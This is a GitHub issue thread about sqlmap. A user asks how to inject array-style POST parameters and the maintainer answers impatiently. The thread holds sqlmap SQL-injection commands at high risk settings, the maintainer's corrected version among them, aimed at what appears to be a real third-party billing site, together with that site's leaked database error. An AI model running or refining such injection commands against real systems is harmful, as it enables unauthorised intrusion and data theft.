### ISSUE TITLE
SQLMAP not inject array parameters (is it possible ?) 

### ISSUE THREAD

**Issue by z3ro** [sqlmapproject/sqlmap#5572]
Error Number: 1054

Unknown column 'Array' in 'where clause'

SELECT * FROM (`accounts`) WHERE `email` = Array OR `number` = Array

Filename: /opt/ASTPP/web_interface/astpp/models/db_model.php

my sqlmap request:

python sqlmap.py -u "https://falconbilling.edgepbx.com.br/confirmpassword" --data="email[]=sample@email.tst&number[*]=1" --dbms=mysql --level 3 --risk 3 --batch

help appreciated

**Comment by z3ro** [comment]
> this is MySQL server error, not sqlmap error.

i understand that, but as the parameter is an array, i believe there is an way to inject .. as i see that before in other case that the parameter it self could be injected.
hope it could be test from the team, and if there any possibility to have this kind of injections feature.

**Comment by TheBdHacker** [comment]
Use other tool

**Comment by stamparm** [comment]
i get 1 year older after i see these kind of "issues".

1) first of all, you have to have a proper request usable for sqlmap in the first place. I am not confident that you know what's the original/usable request in your case
2) if i could guess that the original request was something like `email[]=sample@email.tst&number[]=1` I am wondering why in the ... you are trying to inject inside the `[]`?! who would inject there and why!??
3) try to rerun sqlmap with `--data="email[]=sample@email.tst*&number[]=1*"`

this is not sqlmap issue, but issue in you not understanding basics of web applications. please don't open this kind of issues in the future
